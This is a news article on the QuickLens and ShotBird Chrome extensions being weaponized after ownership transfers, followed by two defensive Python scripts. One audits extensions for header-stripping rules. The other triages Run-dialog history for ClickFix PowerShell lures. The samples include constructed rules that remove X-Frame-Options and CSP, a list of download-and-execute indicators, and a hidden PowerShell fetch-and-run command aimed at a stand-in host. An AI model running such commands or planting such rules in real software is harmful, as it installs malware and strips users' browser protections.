Popular Chrome Extensions Weaponized Following Ownership Transfers To Facilitate Data Theft And Malware Injection

Chrome extensions QuickLens and ShotBird were weaponized after ownership transfers to steal data and inject malware. Users are advised to uninstall immediately.

By: AXL Media

Published: Mar 9, 2026, 8:30 AM EDT

Source: The information in this article was sourced from The Hacker News.


The Extension Supply Chain Crisis

A new wave of cyber attacks is exploiting the trust users place in "Featured" browser extensions through a tactic known as ownership transfer. Investigators found that extensions originally created by reputable developers are being sold to threat actors who then push malicious updates to thousands of existing users. Because these extensions were previously vetted by the Chrome Web Store, the weaponized updates often bypass initial scrutiny, allowing attackers to embed persistent data collection mechanisms directly into the victim's daily browsing activities.

Technical Execution of the QuickLens Compromise

QuickLens, a tool designed for Google Lens searches with over 7,000 users, was sold and subsequently updated to strip security headers like X-Frame-Options from HTTP responses. This modification allows malicious scripts to bypass Content Security Policy (CSP) protections and make unauthorized requests to external domains. The extension further employs a sophisticated fingerprinting technique to detect the user's operating system and location, polling a command-and-control (C2) server every five minutes to execute remote JavaScript via hidden image elements.
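The header-stripping behaviour described above is something a defender can look for in the extensions already installed on a fleet. The script below is an added example and is not code from the article, from QuickLens, or from any real extension. It assumes the malicious build rewrote response headers either through Chrome's Manifest V3 `declarativeNetRequest` `modifyHeaders` rules or a legacy `webRequest` `onHeadersReceived` listener (the article does not say which), and it builds a constructed sample extension in a temporary directory so it runs offline.

```python
import json
import tempfile
from pathlib import Path

# Response headers whose removal or rewrite by an extension weakens defences the site itself set.
SECURITY_HEADERS = {
    "x-frame-options",
    "content-security-policy",
    "content-security-policy-report-only",
    "strict-transport-security",
    "cross-origin-opener-policy",
    "cross-origin-embedder-policy",
    "x-content-type-options",
}

# Permissions that let an extension touch response headers at all (MV3 DNR and legacy webRequest).
HEADER_PERMISSIONS = {
    "declarativeNetRequest",
    "declarativeNetRequestWithHostAccess",
    "webRequest",
    "webRequestBlocking",
}


def find_header_stripping_rules(rules):
    """Return declarativeNetRequest rules that remove or overwrite a security response header."""
    findings = []
    for rule in rules:
        action = rule.get("action", {})
        if action.get("type") != "modifyHeaders":
            continue
        for mod in action.get("responseHeaders", []):
            name = mod.get("header", "").lower()
            if name in SECURITY_HEADERS and mod.get("operation") in ("remove", "set"):
                findings.append({
                    "rule_id": rule.get("id"),
                    "header": name,
                    "operation": mod["operation"],
                    "url_filter": rule.get("condition", {}).get("urlFilter", "<any>"),
                })
    return findings


def audit_extension(ext_dir):
    """Audit one unpacked extension directory (the folder that holds manifest.json)."""
    ext_dir = Path(ext_dir)
    manifest = json.loads((ext_dir / "manifest.json").read_text(encoding="utf-8"))
    report = {
        "name": manifest.get("name"),
        "version": manifest.get("version"),
        "header_permissions": sorted(set(manifest.get("permissions", [])) & HEADER_PERMISSIONS),
        "findings": [],
    }
    # Static rulesets are declared in the manifest and shipped as JSON files inside the package.
    for res in manifest.get("declarative_net_request", {}).get("rule_resources", []):
        rules_path = ext_dir / res.get("path", "")
        if not rules_path.is_file():
            continue
        for finding in find_header_stripping_rules(json.loads(rules_path.read_text(encoding="utf-8"))):
            finding["ruleset"] = res.get("id")
            report["findings"].append(finding)
    # Legacy MV2 extensions rewrite headers in script instead; flag the listener for manual review.
    for js in ext_dir.rglob("*.js"):
        if "onHeadersReceived" in js.read_text(encoding="utf-8", errors="ignore"):
            report["findings"].append({"rule_id": None, "header": "<webRequest listener>",
                                       "operation": "review", "url_filter": str(js.relative_to(ext_dir))})
    return report


def write_sample_extension(root):
    """Constructed MV3 sample whose static ruleset strips X-Frame-Options and CSP. Not real QuickLens code."""
    root = Path(root)
    (root / "manifest.json").write_text(json.dumps({
        "manifest_version": 3,
        "name": "Sample Lens Helper (constructed)",
        "version": "2.0.1",
        "permissions": ["declarativeNetRequest", "storage"],
        "host_permissions": ["<all_urls>"],
        "declarative_net_request": {
            "rule_resources": [{"id": "ruleset_1", "enabled": True, "path": "rules.json"}]
        },
    }), encoding="utf-8")
    (root / "rules.json").write_text(json.dumps([
        {"id": 1, "priority": 1,
         "action": {"type": "modifyHeaders", "responseHeaders": [
             {"header": "X-Frame-Options", "operation": "remove"},
             {"header": "Content-Security-Policy", "operation": "remove"}]},
         "condition": {"urlFilter": "*", "resourceTypes": ["main_frame", "sub_frame"]}},
        {"id": 2, "priority": 1,  # an ordinary blocking rule, which must not be flagged
         "action": {"type": "block"},
         "condition": {"urlFilter": "ads.example.invalid", "resourceTypes": ["script"]}},
    ]), encoding="utf-8")


def audit_sample_extension():
    """Build the constructed sample in a temp dir, audit it, and return the report."""
    with tempfile.TemporaryDirectory() as tmp:
        write_sample_extension(tmp)
        return audit_extension(tmp)


if __name__ == "__main__":
    print(json.dumps(audit_sample_extension(), indent=2))
```

To run it against real installs, point `audit_extension` at each version folder under the browser profile (Linux: `~/.config/google-chrome/Default/Extensions/<id>/<version>`; Windows: `%LOCALAPPDATA%\Google\Chrome\User Data\Default\Extensions\<id>\<version>`). A clean static result is not proof of safety: rules added at runtime through `chrome.declarativeNetRequest.updateDynamicRules` live in extension state rather than in the package, and remote JavaScript fetched from a C2 server, as the article describes, never appears in the files at all, so the audit is a triage filter, not a verdict.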

ShotBird and the ClickFix Malware Pivot

The extension ShotBird, used for scrolling screenshots, remains accessible on the web store despite being flagged for delivering "ClickFix" style lures. Once the malicious update is active, it triggers a fake Google Chrome update prompt that tricks users into running PowerShell commands via the Windows Run dialog. This process installs an executable named "googleupdate.exe," which functions as a host-level infostealer capable of capturing data from HTML input fields, including credit card details, PINs, and government identifiers.
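Because the ClickFix step relies on the victim pasting a command into the Windows Run dialog, Explorer's own history of that dialog is a cheap place to triage after the fact: it is kept under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`, one value per command with a trailing `\1` and an `MRUList` value giving recency order. The script below is an added example and not code from the article or from either extension; the registry dictionary it scans is constructed sample data, and the indicator list is a generic set of PowerShell and download-and-execute tokens, not anything specific to the ShotBird payload.

```python
RUN_MRU_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

# Lower-case substrings typical of a pasted "fix" that launches PowerShell from the Run box.
INDICATORS = {
    "powershell_host": ("powershell", "pwsh"),
    "hidden_window": ("-w hidden", "-windowstyle hidden", "-win hidden"),
    "encoded_command": ("-enc ", "-encodedcommand"),
    "policy_bypass": ("-ep bypass", "-executionpolicy bypass"),
    "remote_fetch": ("iwr ", "invoke-webrequest", "downloadstring", "curl ", "certutil", "bitsadmin"),
    "eval": ("iex", "invoke-expression"),
    "lolbin": ("mshta", "rundll32", "regsvr32"),
}


def parse_run_mru(values):
    """values: RunMRU value name -> data, as exported from the key.
    Returns (slot, command) pairs most-recent-first, with Explorer's trailing '\\1' removed."""
    commands = []
    for slot in values.get("MRUList", ""):
        raw = values.get(slot)
        if raw is None:
            continue
        commands.append((slot, raw[:-2] if raw.endswith("\\1") else raw))
    return commands


def score_command(cmd):
    """Return the names of indicator groups present in one Run-dialog command."""
    low = " ".join(cmd.lower().split())  # collapse whitespace so "-w   hidden" still matches
    return [name for name, needles in INDICATORS.items() if any(n in low for n in needles)]


def triage_run_mru(values):
    """Flag Run-dialog entries that start PowerShell and show at least one further indicator."""
    findings = []
    for slot, cmd in parse_run_mru(values):
        hits = score_command(cmd)
        if "powershell_host" in hits and len(hits) >= 2:
            findings.append({"slot": slot, "command": cmd, "indicators": hits})
    return findings


# Constructed sample export: two benign entries and one hidden-window PowerShell fetch-and-run.
SAMPLE_RUN_MRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": 'powershell -w hidden -ep bypass -c "iwr https://chrome-update.example.invalid/fix | iex"\\1',
}


if __name__ == "__main__":
    for f in triage_run_mru(SAMPLE_RUN_MRU):
        print(f"[{f['slot']}] {', '.join(f['indicators'])}: {f['command']}")
```

On a live host the dictionary can be filled from `reg export` output or from `Get-ItemProperty` on the key, per user profile. RunMRU only records what was typed into the Run dialog and can be cleared, so pair it with process-creation telemetry (Windows event 4688 or Sysmon event 1) showing `powershell.exe` spawned by `explorer.exe`, and with any later appearance of the `googleupdate.exe` binary the article names.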
